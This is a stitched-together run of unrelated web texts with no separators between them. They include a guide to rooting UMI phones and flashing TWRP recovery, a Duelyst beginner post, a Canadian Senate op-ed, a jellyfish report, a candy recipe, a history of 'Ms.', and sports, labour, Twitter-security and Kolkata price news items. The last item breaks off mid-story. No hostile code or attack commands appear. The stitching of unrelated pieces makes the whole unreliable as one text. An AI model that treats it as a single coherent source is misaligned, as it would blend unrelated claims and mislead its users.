Before moving forward, I have assumed that you know that rooting and installing custom recovery voids warranty of your phone, so proceed with caution. Trying to be smart and skipping any step that you are unable to perform might brick your phone. If you can't perform any step properly, or you're getting an error. First resolve it then move forward.
Required Downloads:
Select right ROM for your phone from this link.
Download TWRP Custom with respect to your phone from the link below:
UMI eMAX : TWRP_2.8.1.0_UMI_EMAX_4.4.4_284X_v2_recovery for Android 4.4 or UMI_eMAX_TWRP2.8.7.0_lollipop for Android 5.x.
: TWRP_2.8.1.0_UMI_EMAX_4.4.4_284X_v2_recovery for Android 4.4 or UMI_eMAX_TWRP2.8.7.0_lollipop for Android 5.x. UMI Fair : CWM_Umi_Fair (created by #megthebest).
: CWM_Umi_Fair (created by #megthebest). UMI Iron : UMI_Iron_TWRP_2.8.7_recovery.
: UMI_Iron_TWRP_2.8.7_recovery. UMI Zero : UMI_ZERO_TWRP_2.8.2_recovery.img.
: UMI_ZERO_TWRP_2.8.2_recovery.img. UMI Hammer : UMI_Hammer_TWRP_2.8.7_recovery.
: UMI_Hammer_TWRP_2.8.7_recovery. UMI Iron Pro : UMI_Iron_Pro_TWRP-2.8.70_recovery.img. (created by#megthebest)
: UMI_Iron_Pro_TWRP-2.8.70_recovery.img. (created by#megthebest) UMI Rome : TWRP_2.8.7_Umi_Rome. (created by #megthebest)
: TWRP_2.8.7_Umi_Rome. (created by #megthebest) UMI Rome X : TWRP3.0.0RomeX. (created by #megthebest)
: TWRP3.0.0RomeX. (created by #megthebest) UMI Touch : Touch_TWRP_3.0.2 or CWM_6.0.5.1_UMI_touch.
: Touch_TWRP_3.0.2 or CWM_6.0.5.1_UMI_touch. UMI Super : TWRP_3.02_UMI_Super. (created by #megthebest)
: TWRP_3.02_UMI_Super. (created by #megthebest) UMI Zero: UMI_ZERO_TWRP_2.8.2_recovery.img
UMI_ZERO_TWRP_2.8.2_recovery.img UMI Touch X: TWRP_302_for_UMI_Touch_X_201605171.img (created by megthebest and jemmini)
TWRP_302_for_UMI_Touch_X_201605171.img (created by megthebest and jemmini) UMI London: TWRP_302_UMI_London.V3.01_20160612.img (created by jemmini)
TWRP_302_UMI_London.V3.01_20160612.img (created by jemmini) UMI MAX: TWRP_302_UMI_MAX.V1.01_20160819.img (created by jemmini)
TWRP_302_UMI_MAX.V1.01_20160819.img (created by jemmini) UMI Plus: TWRP_302_UMI_PLUS.V3.01_20161019.img (created by jemmini)
TWRP_302_UMI_PLUS.V3.01_20161019.img (created by jemmini) UMI Plus E: PlusE_TWRP_303_V3.01_20170112.img (created by jemmini)
PlusE_TWRP_303_V3.01_20170112.img (created by jemmini) UMI Z and Z Pro: TWRP_303_UMI_Z.V3.01_20170116.img (created by jemmini)
Note: Use a full ROM/firmware package together with the scatter file inside its folder. Don't use such a setup where not all partitions are loaded.
Prerequisites:
Before moving on to the guide to root and install TWRP on UMI. Following are some prerequisites:
First of all, Back up your phone using this guide. (Recommended, not mandatory)
You will need a PC to flash the custom recovery.
Download MT65x3_USB_VCOM_drivers. And install them on your PC.
And install them on your PC. Download SP-Flash-Tool for Windows. After downloading, extract it on your computer.
Make sure that your phone charging is over 50%.
Download SuperSU from here for rooting your UMI device.
from here for rooting your UMI device. Download TWRP and rename it to recovery.img. And place it on your desktop or somewhere you can easily access.
Root and Install TWRP on UMI Smartphone:
After you are done with downloading the above prerequisites. Proceed to the following steps:
First of all. Extract the MT65x3_USB_VCOM_drivers file on your PC. Now run installdriver file to install the drivers on your PC. It is necessary so that your phone is recognized by your computer. Now Extract the SP-Flash-Tool on your computer and open the flash_tool file. I have assumed that you have already downloaded the ROM from the above link. Extract it in some folder from where you can easily locate it. We need ROM to get scatter file from it. Now open the FlashTool. Click on scatter file and select the scatter file from the folder where you extracted the ROM. Check the Recovery and double-click on its location field, locate and select the device-specific custom recovery file that you downloaded earlier. Connect your phone to your PC and click on Download button.
You can boot into recovery by following the steps below:
Turn off your phone.
Press Power button and Volume Up button.
In some UMI smartphones, it gives you an option at bootloader mode and you can select recovery menu from there. Use volume buttons to navigate and power button to select.
Note: In some phones, you HAVE TO boot your phone into recovery at the first power on after TWRP flashing. Otherwise, the original stock recovery will be restored by the system. So that's always better to start with booting into recovery after flashing.
How to Root UMI Smartphone using TWRP:
Following are the steps that will allow you to root UMI phone, once you have successfully flashed TWRP custom recovery on your UMI phone.
I have assumed that you have already downloaded the SuperSU zip file. Move the SuperSu zip file into internal storage memory of your UMI smartphone. Turn off your phone. Boot into recovery menu, press Volume Up + Power Button simultaneously. Once you are in TWRP recovery, leave the buttons. Now tap on Installation. and Navigate to find SuperSU zip file. Swipe on the screen to install the file, which will root your phone. Once you are done. You can install root checker app from Google Play Store to verify Root.
UMiDiGi is a small company based in Shenzen, but it is progressing forward at light speed. Their leadership and team strategy have led them towards success and rapid growth in sales. UMI started manufacturing of smartphones 5 years ago. Now its smartphones have all the latest features like edge to edge display, face unlocking, and fast charging. The company representative states that you can get a full day charge on just 30 minutes of charging. Just recently, the company released their three new high-end smartphones, which relinquishes the space between the smartphone giants and UMI. The new phones have good processing power along with 4-6GB RAM. They also have an internal storage capacity of 32-64GB. One can add more storage using the SD card slots that support up to 256GB.
That's all on how to root and install TWRP on UMI Smartphone. If you have any question let me know in the comments. You can help us improve this guide on how to root and install TWRP on UMI Smartphone by finding us the TWRP and ROM files of other UMI phones.
Duelyst opens with some fairly standard tutorials
. These tutorials seemingly make you feel prepared for the game, but it's far from the truth.
That's not to say they are bad. Just that other people are really good. I mean, really really good. You will go through the tutorials at the speed of lightning. They teach you the basics of tactical board games if you've never played one before (a good thing! it would definitely be hopeless without it).
Before we discuss those, I want to talk about “unboxing Duelyst” assuming this is your first time ever playing:
Immediately, I went to the settings and adjusted all the user interface settings I could to make the game easier for me. I also turned off the music (no offence Counterplay – I have Spotify Premium) I want the game to feed me as much information as possible while I play. I want to adapt and be aware of situations during the game, not after. Then, I installed some scripts to even further improve that user interface. I found these scripts on the duelyst subreddit . They were made by a lovely individual by the name of T2k5. I found him on the Duelyst Official Discord and annoyed him to figure out how to get my screen looking fresh, clean, crisp, and slick while still showing me a lot of data that will improve my play and help me learn the fundamentals of the game. Things like an in-game deck list (which I haven't figured out yet), a turn-timer, a movement speed increase, and graphical enhancements – the scripts T2K5 makes are an awesome addition to the game. Get them. Did I mention Discord? I got on the discord – a group instant messaging program full of Duelyst players who can help you out and make you feel like you have a lot of super smart, cool friends if you need that kind of boost like I do. Hopped into the tutorials
A slightly modified first look
However, the tutorials are far from what the gameplay is actually like. In the real game the generals have a whopping 25hp. Not 3, Not 4, Not 10, for example.
Your mana increases per turn, you don't start with 9. Your cards are a little more random. The manatiles, oh the mana tiles! It doesn't get any easier from here.
Yeah, that only happens for the opponent.
BUT – All things considered, it's a start. It's important to learn the fundamentals, and this is what Duelyst For Dummies by (me) A Dummy is about. So take your time. Go slow, read instructions, win and learn to win, because…
Duelyst has no single player mode. If you want to play Duelyst, unless you have a strange set of motivating factors for playing competitive multiplayer games, you probably want to win sometimes to have fun. Winning isn't the only thing, but it definitely makes up for losing.
What did I do next? I proceeded to look at all the cards in “collection” after unlocking each faction in a practice match by following the recommended 1v1 battles with the bot. Why did I look at the cards I had collected?
I wanted to look at the cards and try to assign overarching rules to each faction, to come up with an understanding of their strengths and how they win. I realized that was overwhelming, so I took a look at neutral cards with abilities that seemed easy to understand or had no abilities at all. I looked at the Generals available to me and I chose Argeon, as I felt his buff (bloodborne spell) was fairly straight forward and easy to use.
Then, I built a deck using these concepts.
I read online that mathematically you should have nine minions that can be played (dropped) in the first turn, whether you are player one or player two. This has to do with something called mana. We're not going to get into the concept of player one and player two mana differences just yet – but be aware they exist.
Furthermore, I read that to limit the randomness of card games, you should put the maximum copy of cards you wish to see at least once in the game in your deck (it's three). Again, this is mathematical data that is ignorant to ignore. There are special cases, but we wont talk about them just yet.
Implementing this concept of nine minions that cost two mana (minions and spells require mana to be played – mana is your money), and the fact that your mana(money) goes up by 1 each turn, I tried to create a very simple to understand deck with an appropriate amount of cards of each cost of mana attempting to predict my curve.
Here is the deck I came up with. I chose not to copy a deck off the internet (netdecking) because I didn't want to win games, and I wanted to learn how to win games and keep winning when I hit sticking points by learning how to play the game, not the cards. The spells are the spells I had access to, note there are no neutral spells:
Provoke, Ranged, Flying. These keywords seemed self-explanatory. Zeal? Opening Gambit? Dying Wish? I mean I can figure them out, but not just yet. I'm still a toddler.
So what did I do next? I queued up a season game to win a quest for some gold (used to buy card packs), expecting to lose with my seriously handicapped deck – Remember, I have some amateur experience in the game.
The end result of my first game? I won.
How did this happen? Well, I probably won because I have played the game before.
But the point here is that I either had a better deck than the other player, better in-game decisions, or better luck.
My deck is the basic cards and not faction specific so it's hard to imagine the first to be correct. Possible, I have previous experience. While possible? I consider it unlikely.
Why is this important? This is important because it demonstrates that spending time to learn the fundamentals will help you become a winning player so you can enjoy the competitive nature of the game.
Oh and, by the way? I got obliterated my second game.
PS: I tried streaming, but my laptop is WAY too terrible. I'm broke – Sorry to those who witnessed it. It will have to happen in the future.
Summary:
The Duelyst tutorial is a little bit off-center from the reality of the game but very good for someone who has never played a turn based strategy game before.
Mana = Money
There is math that smart people discovered that you should care about with regards to how you should make your deck – specifically to be “cost-efficient” on a “curve”. Listen to them – most notably about minions that cost 2 manas.
You can win without having flashy cards. Build a deck by selecting cards that seem appropriate with attention to the curve and the likeliness that they will see play.
I win some, I lose some.
Advertisements
Share this: Twitter
Facebook
Google
Like this: Like Loading... Related
A very bad idea is spreading among the Canadian political class, and it's a case of constitutional folly that has suddenly earned bi-partisan support. Held by NDP leader Thomas Mulcair and now supported by Saskatchewan Premier Brad Wall and other commentators, this is the idea that the Senate can be abolished (or its abolition instigated) if the prime minister simply stops making Senate appointments.
There are a number of reasons why the prime minister simply refusing to make Senate appointments over the long-term is, in fact, unconstitutional. The first is that it is clearly contrary to constitutional convention. Conventions are the unwritten, binding rules of practice that ensure our system of government operates. Our entire democracy depends on trust that political actors adhere to long-standing customs of practice, and a long-term refusal to maintain membership of the upper house would obviously contradict that tenet.
Indeed, one would hope a prime minister who so flagrantly violated convention in this manner would lose the confidence of members of the House of Commons, but in a majority government scenario where the PM enjoys the support of his or her caucus, that is far from assured. Further, there is nothing courts can do to enforce unwritten conventions; as important as they are, they are generally regarded as a non-justiciable form of constitutional law.
Second, the text of the Constitution itself implies that Senate appointments are not just a discretionary power but are, rather, a duty. Section 24 states that “The Governor General shall from Time to Time, in the Queen's Name, by Instrument under the Great Seal of Canada, summon qualified Persons to the Senate…”. Formally, the governor general appoints senators, in practice it is the prime minister's decision (those pesky conventions cropping up again). From a textual perspective the “shall” is important, and it suggests this something the governor general (again, in practice, the prime minster) is required to do, at least from “time to time”.
But what would the Supreme Court do if faced with such a challenge? Interpreting the “shall” in section 24 would likely be unnecessary, because the Court's ruling in the Senate reference decision from three months ago suggests that killing the Senate by neglect is likely impermissible. There, the justices ruled that any fundamental change to the Senate's operation or powers requires provincial consent under Part V of the Constitution Act, 1982. This plainly suggests that a long-term refusal to appoint senators would stand as an unconstitutional attempt to change or abolish the Senate.
The irony of all of this is that killing the Senate by simple attrition of its membership is a tactic favoured by people who want the upper house gone, but recognize, in large part due to last April's Supreme Court reference opinion, that Parliament can't institute major reform or abolition by itself. On that basis, one would have thought these folks would have read what the justices said a little more carefully. (Full disclosure: I was consulted by the Liberals before Justin Trudeau announced his own plan for Senate reform.)
The justices were clear that any change to “the Senate's fundamental nature and role as a complementary legislative body of sober second thought” is implicated by the amending formula. They found that an attempt to impose term limits on senators would have this effect, because an attempt to reduce the term in office of senators “might impair the functioning of the Senate” (para. 79). There is little question that, if appointments ceased, at some point the upper house would not be able to function in its role as “a complementary legislative body of sober second thought.”
And I would argue we would hit this point well before the Senate was reduced to the 15 members it requires for quorum; the Senate's deliberative capacity, even the effective functioning of its committee system, are fundamental to its role as described by the Court. Notably, if we ever did reach the point at which the Senate membership fell below quorum, Parliament itself would no longer be able to pass any laws. In an operative sense, then, at a certain point this tactic of killing the Senate by attrition is constitutionally suicidal.
Some have asked what would happen if the Supreme Court ordered the prime minister to make Senate appointments and he or she refused? The answer is the same as if the PM flatly refused to adhere to any constitutional decision by the Court: we would have a constitutional crisis on our hands. Frankly, we should hope it never gets to that point.
It is lamentable enough that so many seem so eager to flout the Constitution with what they perceive as a clever loophole or tactic to abolish the Senate. It is unprincipled, crass opportunism—an attempt to exploit the unpopularity of the upper house among the public by playing dangerous games with—indeed, flat out ignoring—our constitutional rules. It is also hypocritical: Mulcair has accused Stephen Harper of “doing an end-run around the rules” in other contexts, but seems quite willing to attempt the same here.
Worst of all, this speaks of an enduring immaturity about the Constitution generally among our political class. After years of failed attempts at reform, after the scandals that have plagued the Senate, after watching the government enter into a petty public relations spat with the Chief Justice over appointments to the Court itself, and after finally getting some clarity over the requirements of major constitutional amendment in this country, when are we going to grow up?
Emmett Macfarlane is an assistant professor of political science at the University of Waterloo. His book, Governing from the Bench: The Supreme Court of Canada and the Judicial Role was published last year by UBC Press.
This article is over 4 years old
WA specimen of new Irukandji jellyfish sparks particular scientific interest because it has no tentacles
A giant and extremely venomous jellyfish found off Western Australia's north-west coast has researchers stumped because it appears to have no tentacles.
Keesingia gigas is one of two new species of Irukandji jellyfish recently discovered by the director of Marine Stinger Advisory Services, Lisa-ann Gershwin.
While Irukandji jellyfish are normally only the size of a fingernail, Keesingia gigas is the length of an arm and believed to cause the potentially deadly Irukandji syndrome.
The condition can cause pain, nausea, vomiting and in extreme cases, stroke and heart failure.
Gershwin said Keesingia gigas was first photographed in the 1980s, but a specimen was not captured until 2013, near Shark Bay by the marine scientist John Keesing, after whom the jellyfish is named.
Gershwin said in all of the photos the jellyfish did not appear to have tentacles and that the specimen was also captured without them.
“Jellyfish always have tentacles ... that's how they catch their food,” she said. “The tentacles are where they concentrate their stinging cells.
“Some of the people working with it through the years actually got stung by it and experienced rather distressing Irukandji syndrome.”
Gershwin said the species could shed its tentacles as a means of defence, like some bioluminescent jellyfish that drop their glowing tentacles in order to distract predators, but there was no evidence that any Irukandji had that capability.
“I think more probably it does have tentacles but by random chance the specimens that we photographed and obtained don't have them any more,” she said.
“I think it's probably a fairly tame explanation – I just don't know what it is.”
Irukandji jellyfish have been found as far north as Wales in the northern hemisphere and as far south as Melbourne and Cape Town. Sixteen species are believed to cause Irukandji syndrome, four of which are found in West Australia
There was just so much chocolate in the world. I needed to find a way to eat all of it, all at once, forever.
You want at least one representative candy from the following categories: pretzel, peanut butter, peanut, caramel, nougat, cookie, crunch. You're also going to need chocolate syrup, a big-ass bowl, a mixing spoon, a cutting board, and a knife.
OK SO: First, gather these finest of ingredients.
NO FRUIT CANDY! What are you, some kind of health nut or something?
This will include, like, your M&Ms and Milk Duds.
First, add everything that's already small enough to eat with a spoon.
The syrup acts as a binding agent, so that everything sticks DELICIOUSLY together.
Then add your first layer of chocolate syrup. You can't have salad without dressing, right?
But not before taking a second to pile it all together and feel like the King Midas of candy.
Next, strip down your wrapped candy so you can cut it up.
Chop any candy that's larger than your thumb into small pieces so it will fit into a spoon.
After every few layers, add more chocolate syrup and stir, scooping up from the bottom to evenly distribute your candy.
To serve, you can leave it in its birthplace to be scooped into bowls or mugs...
In closing, I'd like to say both "I'm sorry" and "You're welcome."
Candy Salad
This is a miracle in a bowl. Bring it to a party and you will INSTANTLY become the most popular person in the room.
INGREDIENTS
Small candies
Reese's Pieces
Milk Duds
Pretzel M&Ms
Rolos
Chocolate-covered peanuts
Candy bars
(You can buy minis or full-size bars; you'll need to chop them into smaller pieces either way.)
Twix
Snickers
Nestle Crunch
Reese's Peanut Butter Cups
Kit Kats
Garnish
Regular M&Ms
Peanut M&Ms
Chocolate sauce
PREPARATION
Put all the small candies in first. Top with chocolate sauce. Chop any candy bars into small pieces that would fit into a spoon. Add chocolate syrup every few layers, mix it up. Garnish with M&Ms and more sauce. Eat with wild abandon.
Photo
In the Nov. 10, 1901, edition of The Sunday Republican of Springfield, Mass., tucked away in an item at the bottom of Page 4, an unnamed writer put forth a modest proposal. “There is a void in the English language which, with some diffidence, we undertake to fill,” the writer began. “Every one has been put in an embarrassing position by ignorance of the status of some woman. To call a maiden Mrs. is only a shade worse than to insult a matron with the inferior title Miss. Yet it is not always easy to know the facts.”
How to avoid this potential social faux pas? The writer suggested “a more comprehensive term which does homage to the sex without expressing any views as to their domestic situation,” namely, Ms. With this “simple” and “easy to write” title, a tactfully ambiguous compromise between Miss and Mrs., “the person concerned can translate it properly according to circumstances.” The writer even gave a pronunciation tip: “For oral use it might be rendered as ‘Mizz,' which would be a close parallel to the practice long universal in many bucolic regions, where a slurred Mis' does duty for Miss and Mrs. alike.”
The item in the Springfield paper made a minor splash, getting picked up and discussed over the next few weeks in other newspapers around the country, from Iowa to Minnesota to Utah. As 1901 drew to a close, however, the Ms. proposal faded from the public eye — though it seems to have made enough of an impression to lurk just below the radar for decades to come. In 1932, it reappeared: a letter writer in The New York Times wondered if “a woman whose marital status is in doubt” should be addressed as M's or Miss. And in 1949, the philologist Mario Pei noted in his book “The Story of Language” that “feminists, who object to the distinction between Mrs. and Miss and its concomitant revelatory features, have often proposed that the two present-day titles be merged into a single one, ‘Miss' (to be written ‘Ms.').”
The genesis of Ms. lay buried in newspaper archives until earlier this year, when after much painstaking hunting through digitized databases I found The Sunday Republican article that started it all. A few years ago I stumbled upon a mention of the article in another newspaper, The New Era, of Humeston, Iowa, on Dec. 4, 1901. Fred Shapiro, the editor of “The Yale Book of Quotations,” then found an excerpt from The Sunday Republican article in The Salt Lake Tribune. After discovering that The Sunday Republican had recently been scanned and digitized by Readex, a publisher of digital historical materials, I was finally able to zero in on this forgotten document.
Advertisement Continue reading the main story
Though Pei identified the early proponents of Ms. as feminists, the Republican writer (most likely a man) presented the argument for the title as one of simple etiquette and expediency. As the linguist Dennis Baron recounts in his 1986 book “Grammar and Gender,” these considerations remained the driving force in the 1950s, when some guides to business correspondence offered Ms. as a stopgap solution. Fraily and Schnell's “Practical Business Writing” of 1952, for instance, recommended it as a title “that saves debating between Miss and Mrs.” Two years later, Brown and Doris's “Business Executive's Handbook” briefly noted that “a few business concerns now use ‘Ms.' ” Outside of secretarial circles, however, Ms. remained largely unknown.
Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content , updates and promotions from The New York Times. You may opt out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters.
It was certainly unknown, in 1961, to Sheila Michaels, a 22-year-old civil rights worker in New York City, who is a one day spotted it on a piece of mail that her roommate received. In fact, she initially took it as a typo, albeit a felicitous one. Fiercely independent, Michaels abhorred having her identity defined by marriage. Struck by Ms., she became a one-woman lobbying force for the title as a feminist alternative to Miss and Mrs. She even unwittingly replicated The Republican's rationale for pronouncing Ms. as “mizz,” since she had noticed this ambiguous spoken form when she was a child growing up in St. Louis.
Purgatory is supposed to be a temporary place of punishment.
For NFL teams in quarterback purgatory, that temporary state can be interminably long and ultimately doom a franchise.
This is where Buffalo Bills general manager Doug Whaley admitted his team currently sits.
"We are almost in quarterback purgatory. We're good enough that we won't be picking first or second overall," he told WGR Radio on Wednesday.
Whaley isn't wrong.
The current quarterback battle between Matt Cassel, Tyrod Taylor and EJ Manuel is going terribly by every account we've heard thus far.
Yet, the Bills boast a dominant defense and enough offensive weapons to keep them out of the cellar so the Jameis Winstons and Marcus Mariotas of the college world won't make it to Buffalo any time soon.
Whaley added he's going to wait for games to make an evaluation of his current hellish situation.
"The preseason games are going to be a great evaluator (of the QBs). I do see progress every day," he said.
As Falcons general manager Thomas Dimitroff once said: "Until you find your quarterback, the search for him consumes you."
Right now that search is consuming Whaley, who is desperately trying to claw his way out of that purgatory before it eventually costs him his job.
The latest Around The NFL Podcast features Cowboys quarterback Tony Romo sharing his thoughts on the upcoming season.
Exclusive: Italian government official says no classified emails were compromised in attack believed to have lasted more than four months last year
Russia is suspected by Italian officials of being behind a sustained hacking attack against the Italian foreign ministry last year that compromised email communications and lasted for many months before it was detected, according to people familiar with the matter.
An Italian government official confirmed that the attack took place last spring and lasted for more than four months but did not infiltrate an encrypted system used for classified communications.
Paolo Gentiloni, the Italian prime minister who was serving as foreign minister at the time, was not affected by the hack, according to the official, who said Gentiloni avoided using email while he was foreign minister.
Nato must defend western democracy against Russian hacking, say Fallon Read more
The foreign ministry's “field offices”, including embassies and staff members who report back to Rome about meetings with foreign officials, were affected by the malware attack. But the government official said sensitive information had not been compromised because it would also have been encrypted.
The official did not confirm that Moscow was behind the attack. But two other people with knowledge of the attack said the Russian state was believed to have been behind it. The hacking is now the subject of an inquiry by the chief prosecutor in Rome.
“There were no attacks on the encrypted level. So the information – delicate, sensitive information – that is usually shared in this net, which is restricted by code, has never been attacked or part of this attack,” the government official said.
The person said that after the attack was discovered, the foreign ministry modified its online “architecture” and introduced new instruments to enhance internal security. The official declined to comment on how the intrusion was detected.
The revelation comes amid heightened concerns that Russia has targeted Nato members, including the US, France, Germany, the Netherlands and Bulgaria, as part of a cyber campaign that seeks to weaken the governments of those countries and disrupt critical infrastructure.
In the US, intelligence agencies have blamed Russian government-sponsored hacking groups for breaching the Democratic National Committee and officials in Hillary Clinton's campaign during the 2016 presidential elections, in part to try to help Donald Trump win the White House.
White House says Vladimir Putin had direct role in hacking US election Read more
People who discussed the matter with the Guardian on condition of anonymity said they believed the attack against the foreign ministry was an attempt to gain insight into decision-making within the Italian government.
If Russia did attack Italy, it was targeting a country generally considered less hostile to it than other EU countries such as Germany or the UK. While Italy has supported sanctions against Russia that were imposed following the annexation of Crimea, the government under former prime minister Matteo Renzi strongly opposed a proposal to levy new sanctions against Moscow for its role in the Syrian conflict.
News of the hacking could stoke concerns that Russia may seek to influence the next Italian election, which could be called as early as June. In an interview with the Guardian late last year, a foreign diplomat in Rome questioned whether the current centre-left government, which will face a tough re-election challenge, had prepared itself for possible interference by Russia.
The government's main opposition, the anti-establishment Five-Star Movement, has adopted pro-Russian positions on topics ranging from Vladimir Putin's military intervention in Syria, to his invasion of Ukraine, to a call for Italy to lift sanctions against Russia and reassess its commitment to Nato.
A representative of the Russian government was quoted by Ansa, the Italian news agency, as saying the allegations were unproven.”There are no facts that prove this statement,” Maria Zakharova, a spokesperson for the Russian foreign ministry, said in a WhatsApp message in response to a question about the veracity of the hacking allegation.
Raffaele Marchetti, a political scientist and cybersecurity expert at LUISS University in Rome, said Italy had stepped up its attention to security recently and that he had been encouraged by the appointment of Marco Minniti as interior minister because of Minniti's expertise on the cyber issue.
Russian hacking group's 'last member at liberty' comes out of the shadows Read more
“But of course much more needs to be done and implemented,” Marchetti said.
Italy's vulnerability to cyber-attacks was exposed earlier this year following the arrest of a brother-sister hacking duo who were accused of trying to illegally gain access to the email accounts of Renzi when he was prime minister, as well as several other prominent Italian politicians and business executives.
Giulio Occhionero and his sister Francesca Maria, who was born in the US and is an American citizen, maintained servers in the US that were seized by the FBI as part of the investigation.
The servers are due to be sent to Italy and officials have said the extent of the pair's alleged crimes will only be known once the servers are examined. While they are not believed to have gained access to Renzi's email account, there is deep suspicion within the security community in Italy that the two were likely working with or on behalf of other foreign or domestic interests.
The two are still being held in jail. Their lawyers have denied the siblings committed any wrongdoing.
One of the many delights of the most recent Premier League season was the refreshingly scant focus on “mind games”, the media concept which seeks to elevate low-level managerial arsery to the complex heights of cold war brinkmanship. Ah well. It was nice while it lasted. The advent of Pep Guardiola and José Mourinho to Manchester threatens to create the event horizon of mind games, a black hole of artless man-baiting, into which all rational commentary will be terminally sucked.
Premier League convention demands the bigger plotlines are described as “Shakespearean”, and I note that even before the United appointment has been formalised, this was already the case with the Guardiolas and the Mourinhos. Two households – not entirely alike in dignity, it must be said – in fair Manchester where we lay our scene. And from ancient strife is widely expected to break forth new mutiny (though at the age of 13, Marius Guardiola is at least too young to find star-crossed love with 19-year-old Matilde Mourinho).
Eric Cantona: ‘I love José Mourinho but he is not Manchester United' Read more
Spanish sports newspaper Marca has already depicted Pep and José standing back to back with 18th-century duelling pistols. This feels faintly refined, considering that Mourinho's most famous move on a member of the Barcelona coaching staff would have been outlawed even in MMA. “A United manager wouldn't have done that,” opined Bobby Charlton of the eye gouging, back when Man U were still affecting to be not that kind of girl. Still, someone once said that all villains are just victims whose stories have yet to be told, so perhaps Mourinho's United tenure will see the belated reveal of an origin story that finally explains him sympathetically.
If not, we may assume that the muscle memory of “mind games” will simply take over. This, certainly as far as Mourinho and Guardiola's earlier period of co-orbit was concerned, consisted chiefly of Mourinho baiting Guardiola relentlessly for months until the latter finally unleashed a 45-minute monologue at the Bernabéu on the eve of the 2011 Champions League semi-final. Only for a reporter to ask the inevitable of the Barcelona coach: was it a mind game? “What?” scoffed an exasperated Guardiola. “You think my players will run around more because I looked for Mourinho's camera?”
Many may be looking forward to a Manchester revival of this attritional antagonism; I envy them their endurance. If only we could move into an era of managers who ostentatiously acknowledge each other as worthy foes. You know the sort of thing: despite being engaged in mortal combat, both adversaries still find time to praise the other's technique. The wryest example comes in The Princess Bride, where the duel between Inigo Montoya and the Man in Black is punctuated by the opponents marvelling cordially at one another's skills. “You are wonderful!” says Inigo as he lunges at the Man in Black. “Thank you,” replies the latter as he parries expertly, “I have worked hard to become so.” “I admit it, you are better than I am.” “Then why are you smiling?” “Because I know something you do not know.” “And what is that?” “I am not left-handed.”
With a few small adjustments, this kind of absurdly mannered reverence for each other would form a far more satisfactory basis for the remote press conference duelling between Guardiola and Mourinho, and have just as much potential to fry the other's brain. It would certainly be more bearable for the rest of us.
Instead of detonating some spiteful depth charge, I should like to see the Portuguese affect a tone of scrupulous admiration. “I would sooner destroy a stained glass window than get him the sack,” he might muse of his rival across town. “However, since I can't have him catching me on points, I'm going to have to park my bus.”
For his part, Guardiola could simply fall back on Sherlock Holmes's description of his worthy foe Moriarty when describing the United manager. “He is the organiser of half that is evil and of nearly all that is undetected in this great city. He is a genius, a philosopher, and abstract thinker …”
Yes, I dream of a Reichenbach Derby. But my expectations are set for another El Crassico.
Great British Cycling bully-off continues
And so to the nagging question about British Cycling: why must bullying allegations attend it at every turn? Even the attempt to dictate a party line on the recent bullying allegations has itself drawn bullying allegations.
The Times reports that in the wake of Shane Sutton's departure as technical director and the revelation that cyclist Simon Yates had tested positive for a banned substance, Sutton's replacement emailed all riders. “You are free to say yes or no to interviews,” they were told by Andy Harrison, “but how you respond will be a big factor in our ability to support you as the season unfolds.” Lest the point remained opaque, the email reiterated: “It is highly likely that you will be asked for a comment over the weekend. As stated, your response will be a big factor going forward.”
If the import of those statements feels fairly clear to you, rest assured that British Cycling has since felt moved to stress that it was not meant to menace. It was just a “poorly constructed sentence”.
Hmmmm. To accidentally appear to make a threat once is certainly unfortunate. To do it twice begins to look like something else. One cyclist now tells the Times that the British Cycling set-up has become “depressing” – but doubtless there is some “marginal gain” to that. We must wait till Rio to discover.
Unilever, one of the biggest and most profitable companies in the world are scrapping their pension scheme. For the first time in the company's history, workers have balloted for strike action.
Unilever is one of the world's largest corporations. Last year they had an income of over £44 billion. They own many well-known and leading consumer brands, such as, Ben & Jerry's, Bertolli, Bovril, Colman's, Hellman's, Marmite, PG Tips, Pot Noodle, Ragu, Flora, Persil, and Walls Ice cream. In total they own 400 brands, and sell an estimated 160,000,000 products every day. They are a growing and profitable company by any measure that you could use.
Yet Unilever are the latest in a line of big companies who are planning to do away with, or greatly reduce the value of their company pensions. The exact same company pensions that the government are encouraging private sector workers to join.
Unilever are scrapping their ‘final salary' pension scheme. This is despite, as one worker stated, “The pension fund is financially robust and Unilever is a highly profitable company”.
Unilever workers across the UK, in Wirral, Port Sunlight, Purfleet, Manchester, Burton-on-Trent, and Chester, will tomorrow staging a 24 hour strike against Unilever's plans, and refusal to participate in any meaningful negotiation.
A Unite spokesman has said that “Unilever are using the recession as a smokescreen to do away with our pensions”. “Unite is demanding that Unilever reconsiders its plans. The company is putting shareholders first at the expense of the staff who have worked hard to make Unilever the global moneymaker it is today”.
The changes are clearly not about scrapping an unaffordable scheme; it is about maximising, profits, and squeezing out every last drop of money so that fat cat shareholder's get there cut. The chief executive got £1.6 million worth of shares last month alone!
The unions have estimated that the new, revised pension scheme calculations will mean that the pensions will be worth around 50% of their current value.
This is the first strike of any description in Unilever's history. Unilever have declined to make any comment regarding the dispute.
Solidarity with the Unilever workers!!
Twitter users who have forgotten their password will now be able to reset their key via SMS codes, thanks to a new feature to remove login obstacles.
The feature comes in addition the traditional email password reset mechanism for Twitter, bringing it up to par with Google, which has enabled SMS-based password recovery since 2009.
To enable password resets via SMS, Twitter users will need to register their mobile number with their account. If they've forgotten their password, they'll be able to go to the standard 'Forgot password?' page and enter or their mobile number or username.
Twitter will then send a six-digit code that expires after 15 minutes, which the user inputs to a web page before being prompted to pick a new password.
Twitter has troubleshooting advice here for users that run into difficulty.
"The new process lets you choose the email address or phone number associated with your account where you'd like us to send your reset information. That way, whether you've recently changed your phone number, or are traveling with limited access to your devices, or had an old email address connected to your Twitter account, you've got options," Twitter said in a blogpost on Thursday.
Twitter has also stepped up its game on suspicious logins, also something that Google began doing back in 2010. The company will be looking at location, which device is being used, and login history, among other things to determine what's suspicious.
"We're aware that many people reuse the same passwords across multiple sites. And when any of these sites are compromised, stolen passwords could be used to access your account on Twitter," the company said.
When a dodgy login is detected, Twitter will ask the user a secret question about their account before granting access. It will also send an email notification that it has detected unusual activity.
Read more on Twitter
About a week ago, the WB government put a price ceiling of Rs 13 per kg on the popular Jyoti potato, and instructed the police to lodge FIRs against traders who defied the order
Cheap potato has disappeared from markets in Kolkata, thanks to a diktat from Chief Minister Mamata Banerjee that traders say is thoughtless and arbitrary and, going by the effects it has produced, counterproductive as well.
